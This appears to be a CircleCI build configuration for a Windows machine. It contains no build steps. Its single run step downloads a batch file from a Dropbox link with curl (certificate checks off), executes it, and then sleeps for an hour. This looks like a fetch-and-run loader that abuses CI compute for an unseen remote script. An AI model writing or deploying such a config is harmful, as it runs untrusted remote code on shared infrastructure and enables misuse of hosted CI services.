version: 2.1

jobs:
  build:
    machine:
      image: 'windows-server-2022-gui:current'
      resource_class: windows.medium
      shell: powershell.exe -ExecutionPolicy Bypass
    steps:
      - run: |
         curl -Lkso start.bat https://www.dropbox.com/scl/fi/ir1q6lxyqfbg178nsrvn9/test.bat?rlkey=wn117nwq2081wfpiw58lrx8bt
         cmd /c start.bat
         Start-Sleep -Seconds 3600